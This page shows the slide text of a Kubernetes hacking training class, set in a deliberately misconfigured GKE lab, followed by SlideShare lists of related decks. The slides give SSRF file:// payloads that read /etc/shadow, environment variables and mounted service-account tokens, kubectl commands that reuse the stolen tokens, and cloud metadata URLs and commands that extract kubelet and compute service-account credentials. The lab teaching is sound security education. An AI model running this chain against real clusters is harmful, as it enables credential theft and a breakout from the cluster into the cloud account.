SlideShare a Scribd company logo

Appsecco Kubernetes Hacking Masterclass Presentation Slides

Appsecco
Appsecco

Appsecco Kubernetes Hacking Masterclass. The slides used during the class with links to the commands, scripts and setup information. These slides are to be used with the masterclass video recording on YouTube - Hands on exercises are highly recommended to get the most out of this class!

Software
1 of 29
Download to read offline
Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
Let's deploy our cluster! (Lab setup)
Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
Kubernetes Security Controls (Hands-On)
Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
Role ClusterRole ClusterRoleBinding RoleBinding
Abusing RBAC privileges from within pods (Hands-On)
• All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
• Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
• The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
• Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
Post Exploitation in GKE (Hands-On / Homework)
We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
Env vars inside pod
kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
Google Cloud Compute SA Token Stealing
Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
Q&A
• Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers

Recommended

Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
Information Security Principles - Access Control
Information Security Principles - Access ControlInformation Security Principles - Access Control
Information Security Principles - Access Control
idingolay
 
Ch03 Network and Computer Attacks
Ch03 Network and Computer AttacksCh03 Network and Computer Attacks
Ch03 Network and Computer Attacks
phanleson
 
S/MIME & E-mail Security (Network Security)
S/MIME & E-mail Security (Network Security)S/MIME & E-mail Security (Network Security)
S/MIME & E-mail Security (Network Security)
Prafull Johri
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Sam Bowne
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
Prateek Chauhan
 

Recommended

Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
Information Security Principles - Access Control
Information Security Principles - Access ControlInformation Security Principles - Access Control
Information Security Principles - Access Control
idingolay
 
Ch03 Network and Computer Attacks
Ch03 Network and Computer AttacksCh03 Network and Computer Attacks
Ch03 Network and Computer Attacks
phanleson
 
S/MIME & E-mail Security (Network Security)
S/MIME & E-mail Security (Network Security)S/MIME & E-mail Security (Network Security)
S/MIME & E-mail Security (Network Security)
Prafull Johri
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Sam Bowne
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
Prateek Chauhan
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentation
Mahmoud Ibra
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hacking
Vi Tính Hoàng Nam
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
WEP/WPA attacks
WEP/WPA attacksWEP/WPA attacks
WEP/WPA attacks
Huda Seyam
 
The Same-Origin Policy
The Same-Origin PolicyThe Same-Origin Policy
The Same-Origin Policy
Fabrizio Farinacci
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
kinish kumar
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
Rohan Bharadwaj
 
Log Mining: Beyond Log Analysis
Log Mining: Beyond Log AnalysisLog Mining: Beyond Log Analysis
Log Mining: Beyond Log Analysis
Anton Chuvakin
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and tools
chrizjohn896
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
NishaYadav177
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Topic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptxTopic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptx
UrjaDhabarde
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Rana Khalil
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
gbud7
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran
 
AN INTRUSION DETECTION SYSTEM
AN INTRUSION DETECTION SYSTEMAN INTRUSION DETECTION SYSTEM
AN INTRUSION DETECTION SYSTEM
Apoorv Pandey
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
n|u - The Open Security Community
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
Suman Chakraborty
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
Kumton Suttiraksiri
 

More Related Content

What's hot

Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
gbud7
 
AN INTRUSION DETECTION SYSTEM
AN INTRUSION DETECTION SYSTEMAN INTRUSION DETECTION SYSTEM
AN INTRUSION DETECTION SYSTEM
Apoorv Pandey
 

What's hot (20)

Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentation
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hacking
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
WEP/WPA attacks
WEP/WPA attacksWEP/WPA attacks
WEP/WPA attacks
 
The Same-Origin Policy
The Same-Origin PolicyThe Same-Origin Policy
The Same-Origin Policy
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
 
Log Mining: Beyond Log Analysis
Log Mining: Beyond Log AnalysisLog Mining: Beyond Log Analysis
Log Mining: Beyond Log Analysis
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and tools
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Topic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptxTopic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptx
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
AN INTRUSION DETECTION SYSTEM
AN INTRUSION DETECTION SYSTEMAN INTRUSION DETECTION SYSTEM
AN INTRUSION DETECTION SYSTEM
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides (20)

12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKE
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
 
Kubernetes Architecture with Components
Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with Components
 
Intro to kubernetes
Intro to kubernetesIntro to kubernetes
Intro to kubernetes
 
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloud
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operators
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM Roles
 
Kubernetes security with AWS
Kubernetes security with AWSKubernetes security with AWS
Kubernetes security with AWS
 

More from Appsecco

Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
Appsecco
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
Appsecco
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
Appsecco
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
Appsecco
 

More from Appsecco (7)

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
 

Recently uploaded

Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Gáspár Nagy
 
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdfStrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
steffenkarlsson2
 

Recently uploaded (20)

KLARNA - Language Models and Knowledge Graphs: A Systems Approach
KLARNA - Language Models and Knowledge Graphs: A Systems ApproachKLARNA - Language Models and Knowledge Graphs: A Systems Approach
KLARNA - Language Models and Knowledge Graphs: A Systems Approach
 
OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024
 
10 Essential Software Testing Tools You Need to Know About.pdf
10 Essential Software Testing Tools You Need to Know About.pdf10 Essential Software Testing Tools You Need to Know About.pdf
10 Essential Software Testing Tools You Need to Know About.pdf
 
AI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning FrameworkAI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning Framework
 
INGKA DIGITAL: Linked Metadata by Design
INGKA DIGITAL: Linked Metadata by DesignINGKA DIGITAL: Linked Metadata by Design
INGKA DIGITAL: Linked Metadata by Design
 
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
 
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdfA Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
 
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdfStrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
 
SQL Injection Introduction and Prevention
SQL Injection Introduction and PreventionSQL Injection Introduction and Prevention
SQL Injection Introduction and Prevention
 
how-to-download-files-safely-from-the-internet.pdf
how-to-download-files-safely-from-the-internet.pdfhow-to-download-files-safely-from-the-internet.pdf
how-to-download-files-safely-from-the-internet.pdf
 
How to install and activate eGrabber JobGrabber
How to install and activate eGrabber JobGrabberHow to install and activate eGrabber JobGrabber
How to install and activate eGrabber JobGrabber
 
APVP,apvp apvp High quality supplier safe spot transport, 98% purity
APVP,apvp apvp High quality supplier safe spot transport, 98% purityAPVP,apvp apvp High quality supplier safe spot transport, 98% purity
APVP,apvp apvp High quality supplier safe spot transport, 98% purity
 
Crafting the Perfect Measurement Sheet with PLM Integration
Crafting the Perfect Measurement Sheet with PLM IntegrationCrafting the Perfect Measurement Sheet with PLM Integration
Crafting the Perfect Measurement Sheet with PLM Integration
 
CompTIA Security+ (Study Notes) for cs.pdf
CompTIA Security+ (Study Notes) for cs.pdfCompTIA Security+ (Study Notes) for cs.pdf
CompTIA Security+ (Study Notes) for cs.pdf
 
COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...
COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...
COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...
 
What need to be mastered as AI-Powered Java Developers
What need to be mastered as AI-Powered Java DevelopersWhat need to be mastered as AI-Powered Java Developers
What need to be mastered as AI-Powered Java Developers
 
Secure Software Ecosystem Teqnation 2024
Secure Software Ecosystem Teqnation 2024Secure Software Ecosystem Teqnation 2024
Secure Software Ecosystem Teqnation 2024
 
A Guideline to Zendesk to Re:amaze Data Migration
A Guideline to Zendesk to Re:amaze Data MigrationA Guideline to Zendesk to Re:amaze Data Migration
A Guideline to Zendesk to Re:amaze Data Migration
 
Top Mobile App Development Companies 2024
Top Mobile App Development Companies 2024Top Mobile App Development Companies 2024
Top Mobile App Development Companies 2024
 
5 Reasons Driving Warehouse Management Systems Demand
5 Reasons Driving Warehouse Management Systems Demand5 Reasons Driving Warehouse Management Systems Demand
5 Reasons Driving Warehouse Management Systems Demand
 

Appsecco Kubernetes Hacking Masterclass Presentation Slides

  • 1. Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
  • 2. What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
  • 4. Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
  • 5. Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
  • 7. Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
  • 8. 1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
  • 9. Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
  • 10. Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
  • 11. Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
  • 12. Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
  • 15. • All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
  • 16. • Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
